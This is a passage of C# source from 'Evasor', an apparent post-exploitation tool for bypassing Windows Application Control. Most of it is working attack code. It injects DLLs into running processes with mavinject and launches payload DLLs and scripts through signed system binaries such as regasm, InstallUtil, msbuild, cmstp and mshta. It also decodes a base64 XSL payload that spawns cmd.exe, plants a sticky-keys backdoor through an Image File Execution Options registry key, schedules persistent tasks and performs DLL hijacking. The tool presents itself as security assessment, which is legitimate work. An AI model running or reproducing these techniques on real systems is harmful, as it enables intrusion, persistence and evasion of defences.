260 | foreach (string s in log)
261 | {
262 | Console.WriteLine(s);
263 | }
264 | Console.ForegroundColor = ConsoleColor.Gray;
265 | // Keep the console window open in debug mode.
266 | }
267 |
268 | private static void Scan_Vulnerable_Process_To_Dll_Injection(string dll)
269 | {
270 | Console.ForegroundColor = ConsoleColor.Cyan;
271 | Console.WriteLine("___________________________________________________");
272 | Console.WriteLine("|Scanning for Process vulnerable to DLL Injection!|");
273 | Console.WriteLine("|_________________________________________________|");
274 | Console.ForegroundColor = ConsoleColor.Gray;
275 |
276 | Process[] processlist = Process.GetProcesses();
277 |
278 | foreach (Process theprocess in processlist)
279 | {
280 | Process process = new Process();
281 | process.StartInfo.FileName = @"C:\Windows\System32\mavinject.exe";
282 | if (theprocess.ProcessName != Process.GetCurrentProcess().ProcessName && theprocess.ProcessName != "mavinject" && theprocess.ProcessName != Process.GetCurrentProcess().ProcessName + ".vshost")
283 | {
284 | process.StartInfo.Arguments = " " + theprocess.Id.ToString() + " /INJECTRUNNING " + PATH_OF_Evasor + dll;
285 | process.StartInfo.ErrorDialog = true;
286 | process.StartInfo.UseShellExecute = false;
287 | process.StartInfo.RedirectStandardOutput = true;
288 | process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
289 | process.Start();
290 | process.WaitForExit();
291 | if (process.ExitCode == 0)
292 | {
293 | string owner = GetProcessExtraInformation(theprocess.Id);
294 | Console.Write("Process:{0} PID:{1} Owner:{2} is ", theprocess.ProcessName, theprocess.Id, owner);
295 | Console.ForegroundColor = ConsoleColor.Green;
296 | Console.WriteLine("DLL Injectable ");
297 | Console.ForegroundColor = ConsoleColor.Gray;
298 | list_of_injectable_process.Add(theprocess.ProcessName + "^" + theprocess.Id + "^" + owner);
299 | Console.ForegroundColor = ConsoleColor.DarkGreen;
300 | printPremissiomns(theprocess);
301 | Console.ForegroundColor = ConsoleColor.Gray;
302 | }
303 | else
304 | {
305 | Console.WriteLine("Process:{0} PID:{1} Owner:{2}", theprocess.ProcessName, theprocess.Id, GetProcessExtraInformation(theprocess.Id));
306 | }
307 | }
308 | }
309 | }
310 |
311 | private static string GetProcessExtraInformation(int processId)
312 | {
313 | // Query the Win32_Process
314 | string query = "Select * From Win32_Process Where ProcessID = " + processId;
315 | ManagementObjectSearcher searcher = new ManagementObjectSearcher(query);
316 | ManagementObjectCollection processList = searcher.Get();
317 |
318 | // Create a dynamic object to store some properties on it
319 | dynamic response = new ExpandoObject();
320 | response.Description = "";
321 | response.Username = "Unknown";
322 |
323 | foreach (ManagementObject obj in processList)
324 | {
325 | // Retrieve username
326 | string[] argList = new string[] { string.Empty, string.Empty };
327 | int returnVal = Convert.ToInt32(obj.InvokeMethod("GetOwner", argList));
328 | if (returnVal == 0)
329 | {
330 | // return Username
331 | response.Username = argList[0];
332 | return response.Username;
333 | }
334 | else
335 | {
336 | return "SYSTEM | LOCAL SERVICE | NETWOTK SERVICE";
337 | }
338 | }
339 | return string.Empty;
340 | }
341 |
342 | private static string take_screen_shot(string imagePath)
343 | {
344 | try
345 | {
346 | var image = ScreenCapture.CaptureDesktop();
347 | image.Save(PATH_OF_Evasor + @"\IMAGES\" + imagePath, ImageFormat.Jpeg);
348 | Console.WriteLine(PATH_OF_Evasor + @"\IMAGES\" + imagePath + " Saved !!!");
349 | return PATH_OF_Evasor + @"\IMAGES\" + imagePath;
350 | }
351 | catch (Exception ex)
352 | {
353 | return string.Empty;
354 | }
355 | }
356 |
357 | private static void Help()
358 | {
359 |
360 | Console.WriteLine(@"""
361 | Evasor Tool Description:
362 | The Evasor is an automated security assessment tool which locates existing executables on the Windows operating system that can be used to bypass any Application Control rules.
363 | It is very easy to use, quick, saves time and fully automated which generates for you a report including description, screenshots and mitigations suggestions, suites for both blue and red teams in the assessment of a post - exploitation phase.
364 |
365 | The overall goals of the tool:
366 | 1. Locating executable files that can be used to bypass the Application Control!
367 | • Retrieving the all running processes relative paths
368 | • Checking every process (executable file) if it vulnerable to DLL Injection by:
369 | 1. Running “MavInject” Microsoft component from path C:\Windows\System32\mavinject.exe with default parameters.
370 | 2. Checking the exit code of the MavInject execution, if the process exited normally it means that the process is vulnerable to DLL Injection and can be used to bypass the Application Control.
371 | 2. Locating processes that vulnerable to DLL Hijacking!
372 | • Retrieving the all running processes
373 | • For each running Process:
374 | 1. Retrieving the loaded process modules
375 | 2. Checking if there is a permission to write data into the directory of the working process by creating an empty file with the name of the loaded module (DLL) or overwriting an existence module file on the working process directory.
376 | 3. If the write operation succeeds – it seems that the process is vulnerable to DLL Hijacking.
377 | 3. Locating for potential hijackable resource files
378 | • Searching for specific files on the computer by their extension.
379 | • Trying to replace that files to another place in order to validate that the file can be replaceable and finally, potentially vulnerable to Resource Hijacking.
380 | • Extensions: xml,config,json,bat,cmd,ps1,vbs,ini,js,exe,dll,msi,yaml,lib,inf,reg,log,htm,hta,sys,rsp
381 | 4. Generating an automatic assessment report word document includes a description of tests and screenshots taken.""");
382 |
383 | Console.ReadLine();
384 | }
385 |
386 | private static void console_AppControl_Bypass_prints()
387 | {
388 | list_of_potential_executables_that_can_bypass_appControl.Clear();
389 | list_of_available_executables_to_bypass_appControl = new List();
390 | search_for_executables_that_can_bypass_appControl();
391 | proof_Of_Concepts = new List();
392 | proof_Of_Concepts_Pictures = new List();
393 | Console.ForegroundColor = ConsoleColor.Yellow;
394 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
395 | Console.ForegroundColor = ConsoleColor.Gray;
396 | Console.WriteLine("The Results are:");
397 | Console.ForegroundColor = ConsoleColor.Yellow;
398 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
399 | Console.ForegroundColor = ConsoleColor.Gray;
400 | while (true)
401 | {
402 | int executableIndex = 0;
403 | foreach (string executable in list_of_available_executables_to_bypass_appControl)
404 | {
405 | Console.WriteLine(executableIndex.ToString() + "." + executable);
406 | executableIndex++;
407 | }
408 | Console.ForegroundColor = ConsoleColor.Yellow;
409 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
410 | Console.ForegroundColor = ConsoleColor.Gray;
411 | Console.WriteLine("Which executable to execute ?(0-" + (executableIndex - 1).ToString() + ")");
412 | int executableIndexToExecute = int.Parse(Console.ReadLine());
413 | Console.ForegroundColor = ConsoleColor.Yellow;
414 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
415 | Console.ForegroundColor = ConsoleColor.Gray;
416 | Process process = new Process();
417 | process.StartInfo.FileName = list_of_available_executables_to_bypass_appControl[executableIndexToExecute];
418 | Console.BackgroundColor = ConsoleColor.DarkGreen;
419 | Console.ForegroundColor = ConsoleColor.White;
420 | if (process.StartInfo.FileName.Contains("cmd")
421 | || process.StartInfo.FileName.Contains("Powershell")
422 | || process.StartInfo.FileName.Contains("regedit.exe")
423 | || process.StartInfo.FileName.Contains("regedt32.exe"))
424 | {
425 | Console.WriteLine("POC --> " + process.StartInfo.FileName);
426 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName);
427 | }
428 | else if (process.StartInfo.FileName.Contains("Pubprn.vbs"))
429 | {
430 | dll = @"\DLLs\Shell.sct";
431 | process.StartInfo.Arguments = @" 127.0.0.1 script:" + PATH_OF_Evasor + dll;
432 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + dll));
433 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
434 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
435 | }
436 | else if (process.StartInfo.FileName.Contains("Tracker.exe"))
437 | {
438 | dll = @"\DLLs\cmd.dll";
439 | process.StartInfo.Arguments = @" /d " + PATH_OF_Evasor + dll + " /c " + @"C:\Windows\write.exe";
440 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
441 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
442 | }
443 | else if (process.StartInfo.FileName.Contains("at.exe"))
444 | {
445 | Console.WriteLine("Enter the time like '00:00' to execute the binary?");
446 | string timeToExecute = Console.ReadLine();
447 | Console.WriteLine("Enter path to executible to run?");
448 | file_To_Execute = Console.ReadLine();
449 | process.StartInfo.Arguments = @" at " + timeToExecute + " /interactive /every:m,t,w,th,f,s,su " + file_To_Execute;
450 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
451 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
452 | }
453 | else if (process.StartInfo.FileName.Contains("winrm.cmd"))
454 | {
455 | file_To_Execute = @"quickconfig";
456 | process.StartInfo.Arguments = @" " + file_To_Execute;
457 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
458 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
459 | }
460 | else if (process.StartInfo.FileName.Contains("SchTasks.exe"))
461 | {
462 | process.StartInfo.Arguments = @" /delete /TN " + "\"" + Process.GetCurrentProcess().ProcessName + "\"";
463 | Console.WriteLine("Enter the time like '00:00' to execute the binary?");
464 | string timeToExecute = Console.ReadLine();
465 | Console.WriteLine("Enter path to executible to run?");
466 | file_To_Execute = Console.ReadLine();
467 | process.StartInfo.Arguments = @" /Create /SC DAILY /TN " + "\"" + Process.GetCurrentProcess().ProcessName + "\"" + " /TR " + "\"" + file_To_Execute + "\"" + " /ST " + timeToExecute;
468 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
469 | process.StartInfo.Arguments = @" /run /TN " + "\"" + Process.GetCurrentProcess().ProcessName + "\"";
470 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
471 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
472 | }
473 | else if (process.StartInfo.FileName.Contains("ATBroker.exe"))
474 | {
475 | Console.WriteLine("Enter path to executible to run?");
476 | file_To_Execute = Console.ReadLine();
477 | process.StartInfo.Arguments = @" /start malware";
478 | Console.WriteLine(@"POC --> set the registry to HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\malware" + @" /t REG_EXPAND_SZ /v Debugger /d " + "\"" + file_To_Execute + "\"" + " /f");
479 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
480 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
481 | }
482 | else if (process.StartInfo.FileName.Contains("forfiles.exe"))
483 | {
484 | file_To_Execute = @"cmd.exe";
485 | process.StartInfo.Arguments = @" /p c:\windows\system32 /m notepad.exe /c " + file_To_Execute;
486 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
487 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
488 | }
489 | else if (process.StartInfo.FileName.Contains("Regsvc.exe"))
490 | {
491 | file_To_Execute = @"\DLLs\pshell.dll";
492 | process.StartInfo.Arguments = " /U " + PATH_OF_Evasor + file_To_Execute;
493 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
494 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
495 | }
496 | else if (process.StartInfo.FileName.Contains("Regasm.exe"))
497 | {
498 | file_To_Execute = @"\DLLs\pshell.dll";
499 | process.StartInfo.Arguments = " /U " + PATH_OF_Evasor + file_To_Execute;
500 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
501 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
502 | }
503 | else if (process.StartInfo.FileName.Contains("wmic.exe"))
504 | {
505 | file_To_Execute = @"cmd.exe";
506 | process.StartInfo.Arguments = " process" + " call create " + file_To_Execute;
507 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
508 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
509 | }
510 | else if (process.StartInfo.FileName.Contains("msiexec"))
511 | {
512 | file_To_Execute = @"\DLLs\powershell.msi";
513 | process.StartInfo.Arguments = "/quiet" + " " + "/i" + " " + PATH_OF_Evasor + file_To_Execute;
514 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " /quiet /i " + PATH_OF_Evasor + file_To_Execute);
515 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
516 | }
517 | else if (process.StartInfo.FileName.Contains("cmstp.exe"))
518 | {
519 | file_To_Execute = @"\DLLs\Shell.inf";
520 | dll = @"\DLLs\cmd.dll";
521 | set_File_content_before_original(file_To_Execute, dll);
522 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
523 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " /s " + PATH_OF_Evasor + file_To_Execute);
524 | process.StartInfo.Arguments = "/s" + " " + PATH_OF_Evasor + file_To_Execute;
525 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
526 | }
527 | else if (process.StartInfo.FileName.Contains("msbuild.exe"))
528 | {
529 | file_To_Execute = @"\DLLs\Shell.csproj";
530 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
531 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute;
532 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
533 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
534 | }
535 | else if (process.StartInfo.FileName.Contains("InstallUtil.exe"))
536 | {
537 | file_To_Execute = @"\DLLs\pshell.dll";
538 | process.StartInfo.Arguments = @"/logfile= /LogToConsole=false /U" + " " + PATH_OF_Evasor + file_To_Execute;
539 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " " + process.StartInfo.Arguments);
540 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
541 | }
542 | else if (process.StartInfo.FileName.Contains("dotnet.exe"))
543 | {
544 | file_To_Execute = @"\DLLs\pshell.dll";
545 | process.StartInfo.Arguments = PATH_OF_Evasor + file_To_Execute;
546 | Console.WriteLine("POC --> " + process.StartInfo.FileName + " " + process.StartInfo.Arguments);
547 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
548 | }
549 | else if (process.StartInfo.FileName.Contains("csc.exe"))
550 | {
551 | file_To_Execute = @"\DLLs\Shell.cs";
552 | dll = @"\DLLs\pshell.dll ";
553 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
554 | Console.ForegroundColor = ConsoleColor.Yellow;
555 | Console.WriteLine("Compile the .cs file and after that you can use InstallUtil.exe to run the DLL created.");
556 | Console.ForegroundColor = ConsoleColor.Gray;
557 | process.StartInfo.Arguments = @" /reference:" + "\"" + @"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" + "\"" + " /out:" + PATH_OF_Evasor + dll + PATH_OF_Evasor + file_To_Execute;
558 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
559 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
560 | }
561 | else if (process.StartInfo.FileName.Contains("Cscript.exe") || process.StartInfo.FileName.Contains("Wscript.exe"))
562 | {
563 | string payload = "PD94bWwgdmVyc2lvbj0nMS4wJz8+DQo8c3R5bGVzaGVldA0KeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvWFNML1RyYW5zZm9ybSIgeG1sbnM6bXM9InVybjpzY2hlbWFzLW1pY3Jvc29mdC1jb206eHNsdCINCnhtbG5zOnVzZXI9InBsYWNlaG9sZGVyIg0KdmVyc2lvbj0iMS4wIj4NCjxvdXRwdXQgbWV0aG9kPSJ0ZXh0Ii8+DQoJPG1zOnNjcmlwdCBpbXBsZW1lbnRzLXByZWZpeD0idXNlciIgbGFuZ3VhZ2U9IkpTY3JpcHQiPg0KCTwhW0NEQVRBWw0KCXZhciByID0gbmV3IEFjdGl2ZVhPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4oImNtZC5leGUiKTsNCgldXT4gPC9tczpzY3JpcHQ+DQo8L3N0eWxlc2hlZXQ+";
564 | file_To_Execute = @"\DLLs\Shell.vbs";
565 | dll = @"\DLLs\minimalist.xml";
566 | File.WriteAllText(PATH_OF_Evasor + @"\DLLs\minimalist.xml", Base64Decode(payload));
567 | Console.WriteLine(Base64Decode(payload));
568 | set_File_content_before_original(file_To_Execute, dll);
569 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute;
570 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
571 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
572 | }
573 | else if (process.StartInfo.FileName.Contains("Odbcconf.exe"))
574 | {
575 | file_To_Execute = @"\DLLs\Shell.rsp";
576 | dll = @"\DLLs\cmd.dll";
577 | set_File_content_before_original(file_To_Execute, dll);
578 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
579 | process.StartInfo.Arguments = " -f" + " " + PATH_OF_Evasor + file_To_Execute;
580 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
581 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
582 | }
583 | else if (process.StartInfo.FileName.Contains("reg.exe"))
584 | {
585 | Console.WriteLine("Enter path for executible to be the backdoor:");
586 | file_To_Execute = Console.ReadLine();
587 | Console.ForegroundColor = ConsoleColor.Yellow;
588 | Console.WriteLine("Steeky keys backdoor created press 5 times the Shift button on your keyboard.");
589 | Console.ForegroundColor = ConsoleColor.Gray;
590 | process.StartInfo.Arguments = " ADD " + "\"" + @"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" + "\"" + @" /t REG_SZ /v Debugger /d " + "\"" + file_To_Execute + "\"" + " /f";
591 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
592 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
593 | }
594 | else if (process.StartInfo.FileName.Contains("fsi.exe"))
595 | {
596 | file_To_Execute = @"\DLLs\Shell.fsscript";
597 | dll = @"\DLLs\cmd.dll";
598 | set_File_content_before_original(file_To_Execute, dll);
599 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
600 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute;
601 | Console.WriteLine("POC --> " + "\"" + process.StartInfo.FileName + "\"" + process.StartInfo.Arguments);
602 | proof_Of_Concepts.Add("POC --> " + "\"" + process.StartInfo.FileName + "\"" + process.StartInfo.Arguments);
603 | }
604 | else if (process.StartInfo.FileName.Contains("rundll32.exe"))
605 | {
606 | dll = @"\DLLs\cmd.dll,#61";
607 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + dll;
608 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
609 | }
610 | else if (process.StartInfo.FileName.Contains("Mshta.exe"))
611 | {
612 | file_To_Execute = @"\DLLs\Shell.hta";
613 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute;
614 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
615 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
616 | }
617 | else if (process.StartInfo.FileName.Contains("csi.exe"))
618 | {
619 | file_To_Execute = @"\DLLs\Shell.txt";
620 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + file_To_Execute;
621 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
622 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
623 | }
624 | else if (process.StartInfo.FileName.Contains("InfDefaultInstall.exe"))
625 | {
626 | file_To_Execute = @"\DLLs\minimalist.sct";
627 | dll = @"\DLLs\Shady.inf";
628 | set_File_content_before_original(dll, file_To_Execute);
629 | Console.WriteLine(File.ReadAllText(PATH_OF_Evasor + file_To_Execute));
630 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + dll;
631 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
632 | }
633 | else if (process.StartInfo.FileName.Contains("Mavinject.exe"))
634 | {
635 | dll = "";
636 | list_of_injectable_process = new List();
637 | Console.BackgroundColor = ConsoleColor.Black;
638 | Console.ForegroundColor = ConsoleColor.Gray;
639 | Scan_Vulnerable_Process_To_Dll_Injection(dll);
640 | Console.ForegroundColor = ConsoleColor.Yellow;
641 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
642 | Console.ForegroundColor = ConsoleColor.Gray;
643 | Console.WriteLine("The Results are:");
644 | Console.ForegroundColor = ConsoleColor.Yellow;
645 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
646 | Console.ForegroundColor = ConsoleColor.Gray;
647 | proof_Of_Concepts = new List();
648 | proof_Of_Concepts_Pictures = new List();
649 | int k = 0;
650 | foreach (string str in list_of_injectable_process)
651 | {
652 | sub_Paths = str.Split('^');
653 | Console.WriteLine(k.ToString() + "." + sub_Paths[0] + " Owner:" + sub_Paths[2]);
654 | k++;
655 | }
656 | Console.ForegroundColor = ConsoleColor.Yellow;
657 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
658 | Console.ForegroundColor = ConsoleColor.Gray;
659 | Console.WriteLine("Which Process to Inject the DLL?(0-" + (k - 1).ToString() + ")");
660 | int processIndex = int.Parse(Console.ReadLine());
661 | Console.ForegroundColor = ConsoleColor.Yellow;
662 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
663 | Console.ForegroundColor = ConsoleColor.Gray;
664 | sub_Paths = list_of_injectable_process[processIndex].Split('^');
665 | Process processs = new Process();
666 | dll = @"\DLLs\cmd.dll";
667 | processs.StartInfo.FileName = @"C:\Windows\System32\mavinject.exe";
668 | processs.StartInfo.Arguments = " " + sub_Paths[1] + " /INJECTRUNNING " + PATH_OF_Evasor + dll;
669 | processs.StartInfo.ErrorDialog = true;
670 | processs.StartInfo.UseShellExecute = false;
671 | processs.StartInfo.RedirectStandardOutput = true;
672 | processs.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
673 | Console.BackgroundColor = ConsoleColor.DarkGreen;
674 | Console.ForegroundColor = ConsoleColor.White;
675 | Console.WriteLine("POC --> " + processs.StartInfo.FileName + processs.StartInfo.Arguments);
676 | proof_Of_Concepts.Add("POC --> " + processs.StartInfo.FileName + processs.StartInfo.Arguments);
677 | Console.BackgroundColor = ConsoleColor.Black;
678 | Console.ForegroundColor = ConsoleColor.Yellow;
679 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
680 | Console.ForegroundColor = ConsoleColor.Gray;
681 | Console.WriteLine("Take a screen shot? (y/n)");
682 | if (Console.ReadLine() == "y")
683 | {
684 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(sub_Paths[0] + "_" + processIndex.ToString() + "_dll-injection.jpeg")));
685 |
686 | }
687 | Console.Write("To exit and return to main menu type ");
688 | Console.ForegroundColor = ConsoleColor.Green;
689 | Console.Write("break");
690 | Console.ForegroundColor = ConsoleColor.Gray;
691 | Console.WriteLine(" else press Enter....");
692 | if (proof_Of_Concepts_Pictures.Count != 0)
693 | {
694 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////
695 | Report.Scan_Vulnerable_Process_To_DLL_Injection(list_of_injectable_process, proof_Of_Concepts, proof_Of_Concepts_Pictures);
696 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////
697 | }
698 | if (Console.ReadLine() == "break")
699 | {
700 | break;
701 | }
702 | }
703 | else
704 | {
705 | dll = @"\DLLs\cmd.dll";
706 | process.StartInfo.Arguments = " " + PATH_OF_Evasor + dll;
707 | Console.WriteLine("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
708 | proof_Of_Concepts.Add("POC --> " + process.StartInfo.FileName + process.StartInfo.Arguments);
709 | }
710 | Console.BackgroundColor = ConsoleColor.Black;
711 | Console.ForegroundColor = ConsoleColor.Gray;
712 | process.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
713 | Console.WriteLine("Take a screen shot? (y/n)");
714 | if (Console.ReadLine() == "y")
715 | {
716 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(list_of_available_executables_to_bypass_appControl[executableIndexToExecute] + "_" + executableIndexToExecute.ToString() + "_dll-Bypass.jpeg")));
717 | }
718 | Console.ForegroundColor = ConsoleColor.Gray;
719 | Console.Write("To exit and return to main menu type ");
720 | Console.ForegroundColor = ConsoleColor.Green;
721 | Console.Write("break");
722 | Console.ForegroundColor = ConsoleColor.Gray;
723 | Console.WriteLine(" else press Enter....");
724 | if (proof_Of_Concepts_Pictures.Count != 0)
725 | {
726 | /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
727 | Report.Scan_For_Executibles_That_Can_Bypass_Windows_AppControl(list_of_available_executables_to_bypass_appControl, proof_Of_Concepts, proof_Of_Concepts_Pictures);
728 | /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
729 | }
730 | if (Console.ReadLine() == "break")
731 | {
732 | break;
733 | }
734 | }
735 | }
736 | private static void console_DLL_Hijack_Bypass_prints()
737 | {
738 | List_Of_Hijckable_dlls = new List();
739 | List_Of_Replaceble_dlls = new List();
740 | dll = "";
741 | Scan_Process_Vulnerable_To_Dll_Hijack(dll);
742 | proof_Of_Concepts = new List();
743 | proof_Of_Concepts_Pictures = new List();
744 | while (true)
745 | {
746 | int i = 0;
747 | Console.WriteLine("Hijack the DLL? (y/n)");
748 | string poc = Console.ReadLine();
749 | if (poc == "y")
750 | {
751 | Console.ForegroundColor = ConsoleColor.Yellow;
752 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
753 | Console.ForegroundColor = ConsoleColor.Gray;
754 | foreach (string str in List_Of_Hijckable_dlls)
755 | {
756 | Console.WriteLine(i.ToString() + "." + str);
757 | i++;
758 | }
759 | Console.ForegroundColor = ConsoleColor.Yellow;
760 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
761 | Console.ForegroundColor = ConsoleColor.Gray;
762 | Console.ForegroundColor = ConsoleColor.Yellow;
763 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
764 | Console.ForegroundColor = ConsoleColor.Gray;
765 | Console.WriteLine("Enter one of the follwing DLL's (cmd.dll,x64.dll,x86.dll).");
766 | dll = Console.ReadLine();
767 | Console.ForegroundColor = ConsoleColor.Yellow;
768 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
769 | Console.ForegroundColor = ConsoleColor.Gray;
770 | Console.WriteLine("Which DLL to Hijack? (0-" + (i - 1).ToString() + ")");
771 | int dllIndex = int.Parse(Console.ReadLine());
772 | sub_Paths = List_Of_Hijckable_dlls[dllIndex].Split('^');
773 | System.IO.File.Copy(PATH_OF_Evasor + @"\DLLs\" + dll, sub_Paths[1]);
774 | Console.ForegroundColor = ConsoleColor.Yellow;
775 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
776 | Console.ForegroundColor = ConsoleColor.Gray;
777 | Console.WriteLine("Type any key to run " + sub_Paths[0] + "!!!");
778 | Console.ReadLine();
779 | Process processs = new Process();
780 | processs.StartInfo.FileName = sub_Paths[0];
781 | processs.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
782 | Console.BackgroundColor = ConsoleColor.DarkGreen;
783 | Console.ForegroundColor = ConsoleColor.White;
784 | Console.WriteLine("POC --> Copy " + PATH_OF_Evasor + @"\DLLs\" + dll + " To " + Path.GetDirectoryName(processs.StartInfo.FileName) + " rename it to the DLL you chose and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments);
785 | proof_Of_Concepts.Add("POC --> Copy " + PATH_OF_Evasor + @"\DLLs\" + dll + " To " + Path.GetDirectoryName(processs.StartInfo.FileName) + " rename it to the DLL you chose and execute " + processs.StartInfo.FileName + processs.StartInfo.Arguments);
786 | Console.BackgroundColor = ConsoleColor.Black;
787 | Console.ForegroundColor = ConsoleColor.Gray;
788 | Console.WriteLine("Take a screen shot? (y/n)");
789 | if (Console.ReadLine() == "y")
790 | {
791 | proof_Of_Concepts_Pictures.Add(take_screen_shot(Path.GetFileName(sub_Paths[0] + "_" + dllIndex.ToString() + "_dll-Hijack.jpeg")));
792 | }
793 | processs.WaitForExit();
794 | File.Delete(sub_Paths[1]);
795 | }
796 | else
797 | {
798 | Console.WriteLine("Replace the DLL? (y/n)");
799 | poc = Console.ReadLine();
800 | if (poc == "y")
801 | {
802 | Console.ForegroundColor = ConsoleColor.Yellow;
803 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
804 | Console.ForegroundColor = ConsoleColor.Gray;
805 | foreach (string str in List_Of_Replaceble_dlls)
806 | {
807 | Console.WriteLine(i.ToString() + "." + str);
808 | i++;
809 | }
810 | Console.ForegroundColor = ConsoleColor.Yellow;
811 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
812 | Console.ForegroundColor = ConsoleColor.Gray;
813 | Console.ForegroundColor = ConsoleColor.Yellow;
814 | Console.WriteLine("___________________________________________________________________________________________________________________________________________");
815 | Console.ForegroundColor = ConsoleColor.Gray;
816 | Console.WriteLine("Enter one of the follwing DLL's (cmd.dll,x64.dll,x86.dll).");
817 | dll = Console.ReadLine();
818 | Console.ForegroundColor = ConsoleColor.Yellow;
